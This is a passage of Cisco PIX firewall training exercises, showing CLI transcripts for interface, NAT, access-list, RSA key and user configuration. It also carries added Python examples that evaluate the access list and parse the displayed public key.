<sby_ip_addr>  Device failover peer's network interface address
<4-16>         Number of retries performed by dhcp client, default is 4
<interface>:   Interface hardware name as used by 'interface' command.
               Composed of <type> <port>[/<subif_number>] or
               <type> <slot>/<port>[/<subif_number>]
<if_name>:     Interface name assigned by 'nameif' command

see also:
nameif, security-level
myPIX (config-if)# ip address dhcp
myPIX (config-if)# no shutdown
myPIX (config-if)# int e1
myPIX (config-if)# nameif mars
myPIX (config-if)# ip address dhcp
myPIX (config-if)# no shutdown
myPIX (config-if)# int e2
myPIX (config-if)# nameif pluto
myPIX (config-if)# ip address dhcp
myPIX (config-if)# no shutdown

Cisco PIX Challenge 47


Outline
This challenge uses a static mapping with non-default names of the interfaces.
Objectives
The objectives of this challenge are to:

Define E0 details.
Define E1 details.
Define a static mapping (with non-default names).

Example (Ver 7.x)


> enable
myPIX # config t
myPIX (config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# ip address 144.128.32.1 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 1
amsterdam (config-if)# exit
amsterdam (config)# int e1
amsterdam (config-if)# nameif vermont
amsterdam (config-if)# ip address 81.213.27.8 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 12
amsterdam (config-if)# exit
amsterdam (config)# int e2
amsterdam (config-if)# nameif northdakota
amsterdam (config-if)# ip address 145.7.193.1 255.255.0.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 10
amsterdam (config-if)# exit
amsterdam (config)# static (vermont,california) 144.128.32.4 81.213.27.18
amsterdam (config)# static (vermont,california) 144.128.32.5 81.213.27.19
amsterdam (config)# static (vermont,california) 144.128.32.6 81.213.27.20

Cisco PIX Challenge 48


Outline
This challenge applies an ACL to the E0 interface.
Objectives
The objectives of this challenge are to:

Define E0 details.
Define an access-list
Apply the access-list to E0.

Example (Ver 7.x)


> enable
myPIX # config t
myPIX (config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# ip address 144.128.32.1 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# security-level 1
amsterdam (config-if)# exit
amsterdam (config)# access-list 101 permit tcp host 132.178.215.10 host 197.161.244.7 eq ftp
amsterdam (config)# access-list 101 deny tcp 120.205.173.0 255.255.0.0 154.213.112.0 255.255.0.0 eq ftp
amsterdam (config)# access-list 101 permit tcp any any
amsterdam (config)# help access-group
USAGE:
[no] access-group <access-list> <in|out> interface <if_name> [per-user-override]

DESCRIPTION:
access-group

Bind an extended access-list to an interface to filter inbound
traffic

SYNTAX:
<access-list>

Extended access list number

<in|out>

Inbound or Outbund access list

<if_name>

Name of the interface

per-user-override

Allow AAA downloaded per-user ACL to override

see also:
access-list, object-group
amsterdam (config)# access-group 101 in interface california
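Two details of this access-list are worth seeing evaluated rather than read: PIX entries take a conventional netmask, so the `deny` line's `255.255.0.0` covers all of 120.205.0.0/16 and 154.213.0.0/16 regardless of the third octet written, and an ACL is first-match with an implicit deny at the end. The Python below is an added example, not part of this challenge or of NetworkSims' material. It models `access-list 101` as entered above and, for Challenge 38, the `icmp permit|deny <ip-address> <net-mask> [<icmp-type>] <if-name>` form from that help text (the transcript there types `icmp enable`; this example follows the documented syntax). The port-name table is constructed; the ICMP behaviour modelled is the documented one: an interface with no entries accepts ICMP addressed to it, while any entry brings first-match evaluation with an implicit deny.

```python
from ipaddress import IPv4Address, IPv4Network

# Constructed port-name table for the one name used in the transcript.
PORT_NAMES = {"ftp": 21}


def pix_network(address, mask):
    """PIX access-list entries take a conventional netmask, not a wildcard.
    strict=False applies the mask the way the firewall does, so
    '120.205.173.0 255.255.0.0' becomes 120.205.0.0/16."""
    return IPv4Network(f"{address}/{mask}", strict=False)


def _endpoint(spec):
    """'any', ('host', A.B.C.D) or (A.B.C.D, M.M.M.M) -> IPv4Network."""
    if spec == "any":
        return IPv4Network("0.0.0.0/0")
    if spec[0] == "host":
        return IPv4Network(f"{spec[1]}/32")
    return pix_network(*spec)


def ace(action, protocol, src, dst, eq=None):
    """One 'access-list <id> permit|deny <proto> <src> <dst> [eq <port>]' entry."""
    port = None if eq is None else int(PORT_NAMES.get(eq, eq))
    return (action, protocol, _endpoint(src), _endpoint(dst), port)


def acl_lookup(aces, protocol, src_ip, dst_ip, dst_port):
    """Evaluate a flow against the list in order: the first matching entry wins,
    and a flow that matches nothing is denied (the implicit deny at the end)."""
    s, d = IPv4Address(src_ip), IPv4Address(dst_ip)
    for action, proto, src, dst, port in aces:
        if proto == protocol and s in src and d in dst and port in (None, dst_port):
            return action
    return "deny"


# access-list 101 exactly as entered in the transcript above.
ACL_101 = [
    ace("permit", "tcp", ("host", "132.178.215.10"), ("host", "197.161.244.7"), eq="ftp"),
    ace("deny", "tcp", ("120.205.173.0", "255.255.0.0"), ("154.213.112.0", "255.255.0.0"), eq="ftp"),
    ace("permit", "tcp", "any", "any"),
]


def icmp_rule(action, address, mask, if_name, icmp_type=None):
    """One 'icmp permit|deny <ip-address> <net-mask> [<icmp-type>] <if-name>' entry
    (Challenge 38); it governs ICMP addressed to the firewall interface itself."""
    return (action, pix_network(address, mask), icmp_type, if_name)


def icmp_to_interface(rules, src_ip, icmp_type, if_name):
    """With no entries for an interface the firewall accepts ICMP to it; once any
    entry exists, first match wins and an unmatched packet is dropped."""
    s = IPv4Address(src_ip)
    applicable = [r for r in rules if r[3] == if_name]
    if not applicable:
        return "permit"
    for action, network, itype, _ in applicable:
        if s in network and itype in (None, icmp_type):
            return action
    return "deny"


# The Challenge 38 entries, written in the documented permit form.
ICMP_RULES = [
    icmp_rule("permit", "10.0.0.0", "255.255.0.0", "inside"),
    icmp_rule("permit", "10.0.0.0", "255.255.0.0", "outside"),
]

if __name__ == "__main__":
    print(acl_lookup(ACL_101, "tcp", "120.205.1.1", "154.213.9.9", 21))      # deny: mask widens the entry
    print(acl_lookup(ACL_101, "tcp", "120.205.173.5", "154.213.112.9", 22))  # permit: port differs, falls to entry 3
    print(icmp_to_interface(ICMP_RULES, "192.168.1.1", "echo", "inside"))    # deny: entries exist, none match
```

A flow that the author probably meant to exempt, 120.205.1.1 to 154.213.9.9 on port 21, is denied because of the mask, and ICMP from a non-10.0.0.0/16 source to `inside` is dropped as soon as any `icmp` entry exists for that interface; the same source is accepted on an interface with no entries.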

Cisco PIX Challenge 49



Outline
This challenge manually generates a public and private RSA key.
Objectives
The objectives of this challenge are to:

Define E0 details.
Generate RSA keys.
Display public key.

Example (Ver 7.x)


> enable
myPIX # config t
myPIX (config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# ip address 144.128.32.1 255.255.255.0
amsterdam (config-if)# no shut
amsterdam (config-if)# exit
amsterdam (config)# crypto key generate rsa
amsterdam (config)# show crypto key mypubkey rsa
amsterdam (config)# sh crypto key mypub rsa
Key pair was generated at: 13:28:00 UTC Jun 25 2006
Key name: <Default-RSA-Key>
Usage: General Purpose Key
Modulus Size (bits): 1024
Key Data:
30819f30 0d06092a 864886f7 0d010101 05000381 8d003081 89028181 00eff641
77632bdc 93f8872a 1631c8ca 24f5e102 826acdb7 346dfaf2 64770144 0dc8625e
20f8c42f 9650eb7f 1eddd836 090a6b94 2ec34e2c cbca8ebe a3f4490a 3daee2aa
40ea6964 eaecc909 46d61ace ffd6aa62 250c21d6 4356610e 7d2e6d61 86591d35
513d3100 7a25f98c 31bb660d 4e47587b ace9bee9 4e6ea81c 78b6e7cd 67020301 0001
amsterdam (config)# crypto ca ?
configure mode commands/options:
authenticate  Get the CA certificate
certificate   Actions on certificates
crl           Actions on certificate revocation lists
enroll        Request a certificate from a CA
export        Export a trustpoint configuration with all associated keys and
              certificates in PKCS12 format.
import        Import certificate or pkcs-12 data
trustpoint    Define a CA trustpoint
amsterdam (config)# crypto ca trustpoint ?
configure mode commands/options:
WORD < 129 char Trustpoint Name
amsterdam (config)# crypto ca trustpoint jupiter
amsterdam (config-ca-trustpoint)# ?
crypto ca trustpoint configuration commands:
accept-subordinates           Accept subordinate CA certificates
crl                           CRL options
default                       Return all enrollment parameters to their
                              default values
email                         Email Address
enrollment                    Enrollment parameters
exit                          Exit from certificate authority trustpoint
                              entry mode
fqdn                          include fully-qualified domain name
help                          Help for crypto ca trustpoint configuration
                              commands
id-cert-issuer                Accept ID certificates
ip-address                    include ip address
keypair                       Specify the key pair whose public key is to be
                              certified
no                            Negate a command or set its defaults
password                      revocation password
serial-number                 include serial number
subject-name                  Subject Name
support-user-cert-validation  Validate remote user certificates using the
                              configuration from this trust point provided
                              that this trust point is authenticated to the
                              CA that issued the remote certificate
amsterdam(config-ca-trustpoint)# enrollment url http://yourcert
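The hex dump printed by `show crypto key mypubkey rsa` is a DER-encoded SubjectPublicKeyInfo, and an operator who copies it into a trusted-keys file or compares it against what an SSH client reports can check it independently of the "Modulus Size" line. The Python below is an added example, not part of the challenge or of NetworkSims' material: a minimal DER walker, written for this page rather than taken from any library, that parses exactly the key data shown above and recovers the modulus size and public exponent. The only constants it relies on are the standard rsaEncryption OID and the DER tags for SEQUENCE, OBJECT IDENTIFIER, BIT STRING and INTEGER.

```python
# Key data exactly as printed by 'show crypto key mypubkey rsa' above.
KEY_DATA_HEX = """
30819f30 0d06092a 864886f7 0d010101 05000381 8d003081 89028181 00eff641
77632bdc 93f8872a 1631c8ca 24f5e102 826acdb7 346dfaf2 64770144 0dc8625e
20f8c42f 9650eb7f 1eddd836 090a6b94 2ec34e2c cbca8ebe a3f4490a 3daee2aa
40ea6964 eaecc909 46d61ace ffd6aa62 250c21d6 4356610e 7d2e6d61 86591d35
513d3100 7a25f98c 31bb660d 4e47587b ace9bee9 4e6ea81c 78b6e7cd 67020301 0001
"""

# DER encoding of OID 1.2.840.113549.1.1.1 (rsaEncryption).
RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")
SEQUENCE, OID, BIT_STRING, INTEGER = 0x30, 0x06, 0x03, 0x02


def read_tlv(buf, pos):
    """Read one DER tag-length-value at pos; returns (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits count the length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("DER length runs past end of data")
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_public_key(hex_dump):
    """Parse a SubjectPublicKeyInfo carrying an RSA key; returns (modulus, exponent).
    Structure: SEQUENCE { SEQUENCE { OID rsaEncryption, NULL },
                          BIT STRING { SEQUENCE { INTEGER n, INTEGER e } } }"""
    der = bytes.fromhex("".join(hex_dump.split()))
    tag, spki, end = read_tlv(der, 0)
    if tag != SEQUENCE or end != len(der):
        raise ValueError("outer SEQUENCE does not span the whole key")
    tag, alg_id, pos = read_tlv(spki, 0)          # AlgorithmIdentifier
    oid_tag, oid, _ = read_tlv(alg_id, 0)
    if tag != SEQUENCE or oid_tag != OID or oid != RSA_ENCRYPTION_OID:
        raise ValueError("not an rsaEncryption key")
    tag, bitstr, _ = read_tlv(spki, pos)          # BIT STRING; first byte = unused-bit count
    if tag != BIT_STRING or bitstr[0] != 0:
        raise ValueError("malformed BIT STRING")
    tag, rsa_key, _ = read_tlv(bitstr, 1)         # RSAPublicKey ::= SEQUENCE { n, e }
    n_tag, n_bytes, pos = read_tlv(rsa_key, 0)
    e_tag, e_bytes, _ = read_tlv(rsa_key, pos)
    if (tag, n_tag, e_tag) != (SEQUENCE, INTEGER, INTEGER):
        raise ValueError("malformed RSAPublicKey")
    return int.from_bytes(n_bytes, "big"), int.from_bytes(e_bytes, "big")


def key_summary(hex_dump):
    """The facts an operator checks: modulus length, exponent, and that n is odd
    (an even modulus could not be a product of two odd primes)."""
    n, e = parse_rsa_public_key(hex_dump)
    return {"modulus_bits": n.bit_length(), "exponent": e, "modulus_is_odd": n % 2 == 1}


if __name__ == "__main__":
    print(key_summary(KEY_DATA_HEX))
```

The parse agrees with the device's own "Modulus Size (bits): 1024" line and shows the conventional public exponent 65537, which is what one expects a freshly generated general-purpose key to report; a 1024-bit modulus is the size this challenge generates, not a size to choose today.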

Cisco PIX Challenge 50


Outline
This challenge defines parameters within username mode.
Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 names.
Define username and password.
Define username attributes.

Example (Ver 7.x)


> enable
myPIX # config t
myPIX (config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# exit
amsterdam (config)# int e1
amsterdam (config-if)# nameif texas
amsterdam (config-if)# exit
amsterdam (config)# int e2
amsterdam (config-if)# nameif newyork
amsterdam (config-if)# exit
amsterdam (config)# username anne password test
amsterdam (config)# username anne attrib
amsterdam (config-username)# vpn-tunnel-protocol ipsec
amsterdam (config-username)# vpn-simultaneous ?
username mode commands/options:
<0-2147483647>  Maximum number of simultaneous logins allowed
amsterdam (config-username)# vpn-simultaneous 2

Cisco PIX Challenge 51


Outline
This challenge involves investigating the initial commands and showing help on them.
Objectives
The objectives of this challenge are to:

Investigate initial mode.
Show help on commands.

Example
> ?
clear   Reset functions
enable  Turn on privileged commands
exit    Exit from the EXEC
help    Interactive help for commands
login   Log in as a particular user
logout  Exit from the EXEC
ping    Send echo messages
quit    Exit from the EXEC
show    Show running system information

> clear ?
igmp  Clear multicast membership related information
> enable ?
<0-15>  Enter optional privilege level (0-15)
<cr>
> exit ?
<cr>
> help ?
enable   Turn on privileged commands
exit     Exit the current command mode
login    Log in as a particular user
logout   Exit from current user profile to unprivileged mode
perfmon  Change or view performance monitoring options
ping     Test connectivity from specified interface to an IP address
quit     Exit the current command mode
> login ?
<cr>
> logout ?
<cr>
> ping ?
Hostname or A.B.C.D     Ping destination IPv4 address or hostname
Hostname or X:X:X:X::X  Ping destination IPv6 address or hostname
<cr>
> quit ?
<cr>
> show ?
checksum  Display configuration information cryptochecksum
curpriv   Display current privilege level
flash:    Display information about flash: file system
history   Display the session command history
version   Display system software version

> show checksum
Cryptochecksum: a0b3ec1d 272c2e58 183687ff b14a65a8
> show curpriv
Username : enable_1
Current privilege level : 1
Current Mode/s : P_UNPR
> show flash
Directory of flash:/
5  -rw-  5103672  14:05:27 Jun 06 2006  image.bin
9  -rw-  5919340  14:10:49 Jun 06 2006  asdm-501.bin

16128000 bytes total (5099008 bytes free)


> show history
?
clear ?
enable ?
exit ?
help ?
login ?
logout ?
ping ?
?
quit ?
show ?
show checksum
show curpriv
show flash
show history
> show version
Cisco PIX Security Appliance Software Version 7.0(1)
Device Manager Version 5.0(1)

Compiled on Thu 31-Mar-05 14:37 by builders
System image file is 'flash:/image.bin'
Config file at boot was 'startup-config'
pixfirewall up 17 mins 34 secs
Hardware:
PIX-515E, 96 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0xfff00000, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB
0: Ext: Ethernet0  : media index 0: irq 10
1: Ext: Ethernet1  : media index 1: irq 11
2: Ext: Ethernet2  : media index 2: irq 11

Licensed features for this platform:
Maximum Physical Interfaces : 3
Maximum VLANs               : 10
Inside Hosts                : Unlimited
Failover                    : Disabled
VPN-DES                     : Enabled
VPN-3DES-AES                : Enabled
Cut-through Proxy           : Enabled
--More------ press any key --
Guards                      : Enabled
URL Filtering               : Enabled
Security Contexts           : 0
GTP/GPRS                    : Disabled
VPN Peers                   : Unlimited
This platform has a Restricted (R) license.
Serial Number: 807290112
Running Activation Key: 0x3f43a2b7 0xf5909081 0x5fd21d2b 0x16cbcc59
Configuration has not been modified since last system restart.
> enable
# help bl
USAGE:
show blocks [address <hex-address>|all|assigned|free|old|
pool <block-size> [dump|header|packet]]
[no] blocks queue history enable [buffer-size]
[clear|show] blocks queue history [detail]
DESCRIPTION:
blocks

System packet buffer (block) utilization and diagnostic


tools. By default, the maximum, lowest, and current
available counts are displayed for each block size.

SYNTAX:
address   Shows a block corresponding to <hex-address>
all       Shows all blocks
assigned  Shows assigned (not free) blocks
free      Shows free blocks
old       Shows old (retained for more than 1 minute) blocks
pool      Shows blocks of a specific <block-size>
header    Shows only the block header
packet    Shows the block header and the packet data
dump      Shows the block header and entire block contents

queue history
Diagnose packet buffer exhaustion

enable
A small amount of memory is always allocated to this
diagnostic. This keyword allocates additional memory
for more extensive diagnostics when needed.
By default, the amount of memory is determined by the
system. Use 'no' to return this memory back to the
system.

buffer-size
Number of memory bytes to allocate for diagnostics

detail
Display a portion of packet buffer contents

# help bo
USAGE:
[no] boot system | config <url>
clear configure boot [system | config]
DESCRIPTION:
boot

Configure the system image and startup-config file used to boot
the system

SYNTAX:
system <url>

Configure a url pointing to the system image file that will
be run on reload. Multiple system urls can be configured, the
first one found will be loaded.
config <url>
Configure a url pointing to the startup-config that will be
used to configure the system on reload. Only one url can be
set, multiple invocations of this command will overwrite the
previous setting.
When you use these commands, you affect only the running configuration.
You must save the environment variable setting to your startup configuration
to place the information under ROM monitor control and to have the
environment variable function as expected. Use the write mem or
copy running-config startup-config commands to save the environment variable
from your running configuration to your startup configuration and place them
under ROM monitor control.
# sh process
    PC       SP       STATE     Runtime  SBASE    Stack          Process
Lwe 00105689 00ffbe90 00db4a10        0 00ff9f08 8072/8192      block_diag
Mrd 001dba60 011c63d0 00db4a78   593450 011c2478 16044/16384    Dispatch Unit
Mwe 00112cf5 0120bec0 00db49c8        0 01209f48 7772/8192      Reload Control Thread
Mwe 00116edf 0120e410 00db5ff8        0 0120c4c8 8008/8192      aaa
Lwe 001db106 012168c0 00dbe540        0 01214948 7308/8192      dbgtrace
Msi 003cda1f 0121ab00 00db49c8        0 01218b88 7840/8192      557mcfix
Mrd 003cd97a 0121cc20 00db4a78  1270490 0121aca8 7660/8192      557poll
Msi 003cd9cb 0121ed40 00db49c8        0 0121cdc8 7776/8192      557statspoll
Mwe 00b6e13d 0122f5e0 00db49c8        0 0122d658 7788/8192      Chunk Manager
Msi 006f6c3e 01238cb8 00db49c8        0 01236d50 7684/8192      PIX Garbage Collector
Lsi 00a4d60d 0123adf8 00db49c8        0 01238e70 7428/8192      route_process
Mwe 006e73bd 012481b8 00d3a280        0 01246240 8056/8192      IP Address Assign
Mwe 008ce47d 0124dd80 00d441f0        0 0124be08 8056/8192      QoS Support Module
Mwe 0074ff85 0124fed8 00d3af64        0 0124df60 8056/8192      Client Update Task
Lwe 00b89581 012527b0 00db49c8     7780 01250838 7740/8192      Checkheaps
Mwe 00908601 01258b00 00db49c8        0 01256b98 7276/8192      Session Manager
Mwe 009eba89 012636b8 016dda58        0 0125f7d0 15636/16384    uauth
Mwe 009e7911 01267910 00d5ad60        0 012659c8 7660/8192      SMTP
Mwe 009d8925 01269a40 00d5a730        0 01267ae8 7276/8192      Logger
Mwe 009d9d31 0126bb80 00db49c8        0 01269c08 7292/8192      Thread Logger
Mwe 00ac127b 01278230 00d85390        0 012762c8 6956/8192      vpnlb_thread
Msi 00487913 0131e2a8 00db49c8        0 0131c330 7324/8192      arp_timer
Mwe 004907b1 013231d8 00dcca70        0 01321270 7964/8192      arp_forward_thread
Mwe 009edfa9 0133e988 00d5b770        0 0133ca20 7824/8192      tcp_fast
Mwe 009ededd 013409a0 00d5b770        0 0133ea48 7808/8192      tcp_slow
Mwe 009f893b 01350d90 00d5b8f0        0 0134ee28 8040/8192      udp_timer
Mrd 005e39c6 0122b330 00db4a78   813010 01229418 7788/8192      snp_timer_thread
Mwe 00166f31 01225ea8 00db49c8        0 01223f20 7976/8192      CTCP Timer process
Mwe 0017c064 01631c38 01228490        0 0162fcd0 7700/8192      IPsec message handler
Msi 00189b71 01633c60 00db49c8        0 01631cf8 7720/8192      CTM message handler
Mwe 00a78685 01635c78 00db49c8        0 01633d20 7928/8192      L2TP data daemon
Mwe 00a78475 01637cb0 00db49c8        0 01635d48 7944/8192      L2TP mgmt daemon
Mwe 00a637df 0166fdb8 00d80128        0 0166be50 16184/16384    ppp_timer_thread
Msi 00ac1b7a 01671dc0 00db49c8        0 0166fe78 7792/8192      vpnlb_timer_thread
Mwe 00691e95 016864c8 00db49c8        0 01682560 16048/16384    IP Background
Mwe 001d48dd 016cf518 00d11ef0       10 016af5c0 126852/131072  tmatch compile
Mwe 0081bbd9 0170df38 00db49c8        0 01709fb0 15980/16384    Crypto PKI RECV
Mwe 008212d4 01710038 00db49c8        0 0170e0d0 7772/8192      Crypto CA
Lsi 0070b0a9 01212690 00db49c8        0 01210708 7856/8192      uauth_urlb clean
Lsi 006f1020 01771498 00db49c8        0 0176f520 7840/8192      perfmon
Mwe 0041eb69 01773808 00db49c8        0 01771890 7960/8192      IKE Timekeeper
Mwe 004117a9 01778ba8 00d2c9c0        0 01774f50 15404/16384    IKE Daemon
Mwe 009add91 0177bb80 00d5a0f8        0 01779c08 8056/8192      RADIUS Proxy Event
Mwe 009838b4 0177db30 017b5b68        0 0177bd28 7260/8192      RADIUS Proxy Listener
Mwe 009af891 0177fdd0 00db49c8        0 0177de48 7976/8192      RADIUS Proxy Time
M*  001e41e7 0009feec 00db4a78     1730 017a49d8 4844/16384     ci/console
Csi 007260e9 017aaa60 00db49c8        0 017a8af8 7340/8192      update_cpu_usage
Msi 007268bd 017b0c48 00db49c8        0 017aed70 7364/8192      NIC status poll
Mwe 00a9ead8 017bd5e0 00d8457c        0 017bb688 8024/8192      vpnfo_thread_msg
Msi 00aaa63b 017bf608 00db49c8        0 017bd6b0 7808/8192      vpnfo_thread_timer
Mwe 00aa70f7 017c1630 00d84688        0 017bf6d8 8024/8192      vpnfo_thread_sync
Msi 00aa9f28 017c3760 00db49c8        0 017c17f8 7824/8192      vpnfo_thread_unsent

# sh startup
: Saved
: Written by enable_15 at 15:48:15.415 UTC Thu Dec 28 2006
PIX Version 7.0(1)
names
!
interface Ethernet0
shutdown
no nameif
no security-level
no ip address
!
interface Ethernet1
shutdown
no nameif
no security-level
no ip address
!
interface Ethernet2
shutdown
no nameif
no security-level
no ip address
!
enable password 8Ry2YjIyt7RRXU24 encrypted
passwd 2KFQnbNIdI.2KYOU encrypted
hostname pixfirewall
ftp mode passive
pager lines 2
no asdm history enable
arp timeout 14400
timeout xlate 3:00:00
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00
timeout mgcp-pat 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
no snmp-server location
no snmp-server contact
snmp-server enable traps snmp
telnet timeout 5
ssh timeout 5
console timeout 0
!
class-map inspection_default
match default-inspection-traffic
!
!
policy-map global_policy
class inspection_default
inspect dns maximum-length 512
inspect ftp
inspect h323 h225
inspect h323 ras
inspect rsh
inspect rtsp
inspect esmtp
inspect sqlnet
inspect skinny
inspect sunrpc
inspect xdmcp
inspect sip
inspect netbios
inspect tftp
!
service-policy global_policy global
Cryptochecksum:a0b3ec1d272c2e58183687ffb14a65a8
# a?
# b?
# c?

Cisco PIX Challenge 52

Outline
This challenge involves investigating the initial commands and showing help on them.
Objectives
The objectives of this challenge are to:

Investigate initial mode.
Show help on commands.

Example
pixfirewall# help ?
activation-key  Modify activation-key
arp             Show ARP cache or clear ARP cache or statistics
blocks          System packet buffer utilization
boot            Configure the system image and startup-config file to boot
                the system
capture         Capture inbound and outbound packets on one or more
                interfaces
cd              Change the working directory
configure       Configure from terminal
copy            Copy files from and to, disk or flash or TFTP server or HTTP
                server
crashinfo       Configure, test and view crash information collection
debug           Debug packets or ICMP tracings through the system
delete          Delete a file
dir             Display the directory contents
disable         Exit from privileged mode
downgrade       Downgrade the file system and reboot
erase           Erase and format filesystem
exit            Exit the current command mode
format          Format filesystem
fsck            File system check
kill            Terminate a telnet session
logging         Configure, show, clear logging command options or operational
                data
logout          Exit from current user profile to unprivileged mode
memory          System memory utilization
mkdir           Create new directory
more            Display a file's contents
ospf            Display or clear OSPF information
perfmon         Change or view performance monitoring options
ping            Test connectivity from specified interface to an IP address
pwd             Display the current directory
quit            Exit the current command mode
reload          Halt and reload system
rename          Rename a file
resource        Display or clear resource usage
rmdir           Remove existing directory
shun            Manages the filtering of packets from undesired hosts
terminal        Turn on/off syslogging or set pagers for the terminal
traffic         Counters for traffic statistics
undebug         Undebug packets or ICMP tracings through the system
who             Show active administration sessions
write           Write config to net, flash, or terminal, or erase flash
pixfirewall# help act
USAGE:
activation-key <activation-key-four-or-five-tuple>
show activation-key
DESCRIPTION:
activation-key  Modify activation-key.
SYNTAX:
<activation-key-four-or-five-tuple>  a four or five element hexadecimal string.
pixfirewall# help arp
Unrecognized command: arp

At the end of show <command>, use the pipe character '|' followed by:
begin|include|exclude|grep [-v] <regular_exp>, to filter show output.
activation-key  Modify activation-key.
boot            Configure the system image and startup-config file used to boot
                the system
blocks          System packet buffer (block) utilization and diagnostic
                tools. By default, the maximum, lowest, and current
                available counts are displayed for each block size.
capture         Capture inbound and outbound packets on one or more interfaces
configure       Configure from terminal
copy            Copy files from and to, disk or flash or TFTP server or HTTP server
Crashinfo       Read, write and configure crash write to flash. Force a crash.
debug           Enable debugging functions
disable         Exit from privileged mode
firewall        Switch to router/transparent mode.
kill            Terminate a telnet session
logout          Exit from current user profile to unprivileged mode
logging         Configure, show or clear logging command options or
                operational data
memory          System memory utilization and diagnostic tools
mode            Toggle between single and multiple security context mode
more            Display a file's contents
ospf            Show or clear OSPF information
perfmon         Display perfmon stats or change options
ping            Test connectivity from specified interface to an IP address
priority-queue  Configure a priority queue object
quit            Disable, end configuration or logout
reload          Halt and reload system
resource        Display system resource allocation and usage
session         Open a command session to another module
hw-module       Perform operations on an installed hardware module
shun            Manages the filtering of packets from undesired hosts
terminal        Set and reset terminal monitor or pagination
downgrade       Downgrade the system image. Unit will reboot with execution
                of this command.
traffic         Counters for traffic statistics
who             Show active administration sessions on the device
write           Write config to net, flash, or terminal, or erase flash.
                Write without argument defaults to write memory
cd              Change the working directory
delete          Delete a file
dir             Display the directory contents
erase           Erase and format filesystem
format          Format filesystem
more            Display a file's contents
pwd             Display the current directory
mkdir           Create new directory
rename          Rename a file
rmdir           Remove existing directory
fsck            Perform file system check
pixfirewall# help bl
USAGE:
show blocks [address <hex-address>|all|assigned|free|old|
pool <block-size> [dump|header|packet]]
[no] blocks queue history enable [buffer-size]
[clear|show] blocks queue history [detail]
DESCRIPTION:
blocks  System packet buffer (block) utilization and diagnostic
        tools. By default, the maximum, lowest, and current
        available counts are displayed for each block size.
SYNTAX:
address        Shows a block corresponding to <hex-address>
all            Shows all blocks
assigned       Shows assigned (not free) blocks
free           Shows free blocks
old            Shows old (retained for more than 1 minute) blocks
pool           Shows blocks of a specific <block-size>
header         Shows only the block header
packet         Shows the block header and the packet data
dump           Shows the block header and entire block contents
queue history  Diagnose packet buffer exhaustion
enable         A small amount of memory is always allocated to this
               diagnostic. This keyword allocates additional memory
               for more extensive diagnostics when needed.
               By default, the amount of memory is determined by the
               system. Use 'no' to return this memory back to the
               system.
buffer-size    Number of memory bytes to allocate for diagnostics
detail         Display a portion of packet buffer contents

pixfirewall# help bo
USAGE:
[no] boot system | config <url>
clear configure boot [system | config]
DESCRIPTION:
boot  Configure the system image and startup-config file used to boot
      the system
SYNTAX:
system <url>  Configure a url pointing to the system image file that will
              be run on reload. Multiple system urls can be configured, the
              first one found will be loaded.
config <url>  Configure a url pointing to the startup-config that will be
              used to configure the system on reload. Only one url can be
              set, multiple invocations of this command will overwrite the
              previous setting.
When you use these commands, you affect only the running configuration.
You must save the environment variable setting to your startup configuration
to place the information under ROM monitor control and to have the
environment variable function as expected. Use the write mem or
copy running-config startup-config commands to save the environment variable
from your running configuration to your startup configuration and place them
under ROM monitor control.
pixfirewall# help cap
USAGE:
capture <capture-name> [type raw-data] [type asp-drop <drop-code>]
[type isakmp]
[access-list <acl-name>] [buffer <buf-size>]
[ethernet-type <type>] [interface <if-name>]
[packet-length <bytes>]
[circular-buffer]
clear capture <capture-name>
no capture <capture-name> [type raw-data][type asp-drop <drop-code>]
[type isakmp]
[access-list <acl_name>] [circular-buffer] [interface <if-name>]
show capture [[context-name/]<capture-name> [access-list <acl-name>]
[count <number>] [detail] [dump][decode][packet-number <number>]]
DESCRIPTION:
capture  Capture inbound and outbound packets on one or more interfaces
SYNTAX:
<capture-name>  - name of capture
<context-name>  - name of the context
<acl-name>      - capture IP packets that match access-list <acl-name>
<buf-size>      - size of capture buffer in bytes, range <84-33554432>
<type>          - capture Ethernet packets of <type>, valid types are
                  ip, arp, rarp, ipx, ip6, ppoed, pppoes and <0-65535>
<if-name>       - the physical interface to listen
<bytes>         - maximum length to save from each packet
circular-buffer - overwrite buffer from beginning when full
count           - display <number> of packets in capture
detail          - display more information for each packet
dump            - display the hex dump for each packet
see also: copy
pixfirewall# help cd
USAGE:
cd [{disk0:|disk1:|flash:}][<path>]
DESCRIPTION:
cd  Change the working directory
SYNTAX:
{disk0:|disk1:|flash:} Optional parameter that specifies the filesystem
<path>                 Directory name
pixfirewall# help conf
USAGE:
configure terminal
DESCRIPTION:
configure  Configure from terminal
SYNTAX:
see also: the configure options in configure mode
pixfirewall# help copy
USAGE:
copy [/<options>] capture:[<context-name>/]<buffer name> <URL>
copy [/<options>] [<local>:]<file spec> [<local>:]<file spec>
copy [/<options>] [<local>:]<file spec> <URL>
copy [/<options>] <URL> [<local>:]<file spec>
DESCRIPTION:
copy  Copy files from and to local and remote file systems
SYNTAX:
<options>       noconfirm - Do not prompt for confirmation
                pcap      - Use raw dump of the capture buffer
<local>         Local file system prefix, default assumed if omitted
